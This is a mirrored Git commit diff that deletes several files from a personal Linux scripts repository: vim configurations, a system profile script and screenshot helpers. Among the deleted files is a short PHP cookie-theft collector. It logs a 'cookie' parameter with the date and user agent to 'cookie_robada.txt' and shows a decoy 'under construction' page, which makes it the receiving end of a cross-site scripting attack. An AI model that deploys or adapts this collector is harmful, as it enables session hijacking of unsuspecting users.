mirror of
https://github.com/edu4rdshl/linuxscripts.git
synced 2026-07-18 07:34:45 +00:00
Removed unnecesaries files
This commit is contained in:
parent
522e4c513d
commit
169fb2be36
6 changed files with 0 additions and 116 deletions
29
gvimrc
29
gvimrc
|
|
@ -1,29 +0,0 @@
|
||||||
syn on
|
|
||||||
set guifont=Monospace\ Bold\ 12
|
|
||||||
let do_syntax_sel_menu = 1|runtime! synmenu.vim|aunmenu &Syntax.&Show\ File\ Types\ in\ Menu
|
|
||||||
colors gruvbox
|
|
||||||
set background=dark
|
|
||||||
|
|
||||||
" Uncomment the following to have Vim jump to the last position when
|
|
||||||
" reopening a file
|
|
||||||
if has("autocmd")
|
|
||||||
au BufReadPost * if line("'\"") > 1 && line("'\"") <= line("$") | exe
|
|
||||||
"normal! g'\"" | endif
|
|
||||||
endif
|
|
||||||
|
|
||||||
" Uncomment the following to have Vim load indentation rules and plugins
|
|
||||||
" according to the detected filetype.
|
|
||||||
if has("autocmd")
|
|
||||||
filetype plugin indent on
|
|
||||||
endif
|
|
||||||
|
|
||||||
set showmatch
|
|
||||||
"set mouse=a
|
|
||||||
set tabstop=4
|
|
||||||
set expandtab
|
|
||||||
set shiftwidth=4
|
|
||||||
set smartindent
|
|
||||||
set autoindent
|
|
||||||
set cindent
|
|
||||||
"
|
|
||||||
|
|
||||||
44
profile
44
profile
|
|
@ -1,44 +0,0 @@
|
||||||
# /etc/profile
|
|
||||||
|
|
||||||
# Set our umask
|
|
||||||
umask 022
|
|
||||||
|
|
||||||
# Append our default paths
|
|
||||||
appendpath () {
|
|
||||||
case ":$PATH:" in
|
|
||||||
*:"$1":*)
|
|
||||||
;;
|
|
||||||
*)
|
|
||||||
PATH="$PATH:$1"
|
|
||||||
esac
|
|
||||||
}
|
|
||||||
|
|
||||||
appendpath '/usr/local/sbin'
|
|
||||||
appendpath '/usr/local/bin'
|
|
||||||
appendpath '/usr/bin'
|
|
||||||
unset appendpath
|
|
||||||
|
|
||||||
export PATH
|
|
||||||
|
|
||||||
# Load profiles from /etc/profile.d
|
|
||||||
if test -d /etc/profile.d/; then
|
|
||||||
for profile in /etc/profile.d/*.sh; do
|
|
||||||
test -r "$profile" && . "$profile"
|
|
||||||
done
|
|
||||||
unset profile
|
|
||||||
fi
|
|
||||||
|
|
||||||
# Source global bash config
|
|
||||||
if test "$PS1" && test "$BASH" && test -z ${POSIXLY_CORRECT+x} && test -r /etc/bash.bashrc; then
|
|
||||||
. /etc/bash.bashrc
|
|
||||||
fi
|
|
||||||
|
|
||||||
# Termcap is outdated, old, and crusty, kill it.
|
|
||||||
unset TERMCAP
|
|
||||||
|
|
||||||
# Man is much better than us at figuring this out
|
|
||||||
unset MANPATH
|
|
||||||
|
|
||||||
#set keyboard layout
|
|
||||||
setxkbmap -layout latam
|
|
||||||
conkyp &
|
|
||||||
|
|
@ -1,11 +0,0 @@
|
||||||
<?php
|
|
||||||
$collectedCookie=$HTTP_GET_VARS["cookie"];
|
|
||||||
$date=date("l ds of F Y h:i:s A");
|
|
||||||
$user_agent=$_SERVER['HTTP_USER_AGENT'];
|
|
||||||
$file=fopen('cookie_robada.txt','a');
|
|
||||||
fwrite($file,"DATE:$date || USER AGENT:$user_agent || COOKIE:$cookie \n");
|
|
||||||
fclose($file);
|
|
||||||
echo '<b>Lo sentimos, esta página está en construcción.</b></br></br>Click aquí<a
|
|
||||||
href="http://www.google.com/">here</a> para volver a la página anterior. ';
|
|
||||||
?>
|
|
||||||
|
|
||||||
2
spt
2
spt
|
|
@ -1,2 +0,0 @@
|
||||||
#!/usr/bin/bash
|
|
||||||
scrot -q 100 -ub '%Y-%m-%d-%H%M%S-sechacklabs.jpg' -e 'mv $f /home/sechacklabs/Pictures/Screenshots/'
|
|
||||||
2
sptc
2
sptc
|
|
@ -1,2 +0,0 @@
|
||||||
#!/usr/bin/bash
|
|
||||||
scrot -q 100 -b '%Y-%m-%d-%H%M%S-sechacklabs.jpg' -e 'mv $f /home/sechacklabs/Pictures/Screenshots/'
|
|
||||||
28
vimrc
28
vimrc
|
|
@ -1,28 +0,0 @@
|
||||||
" Vim configuration file
|
|
||||||
|
|
||||||
syntax on
|
|
||||||
set guifont=Monospace\ Bold\ 12
|
|
||||||
colors gruvbox
|
|
||||||
set background=dark
|
|
||||||
|
|
||||||
" Uncomment the following to have Vim jump to the last position when
|
|
||||||
" reopening a file
|
|
||||||
if has("autocmd")
|
|
||||||
au BufReadPost * if line("'\"") > 1 && line("'\"") <= line("$") | exe
|
|
||||||
"normal! g'\"" | endif
|
|
||||||
endif
|
|
||||||
|
|
||||||
" Uncomment the following to have Vim load indentation rules and plugins
|
|
||||||
" according to the detected filetype.
|
|
||||||
if has("autocmd")
|
|
||||||
filetype plugin indent on
|
|
||||||
endif
|
|
||||||
|
|
||||||
set showmatch
|
|
||||||
"set mouse=a
|
|
||||||
set tabstop=4
|
|
||||||
set shiftwidth=4
|
|
||||||
set smartindent
|
|
||||||
set autoindent
|
|
||||||
set cindent
|
|
||||||
"set mouse=a
|
|
||||||
Loading…
Add table
Add a link
Reference in a new issue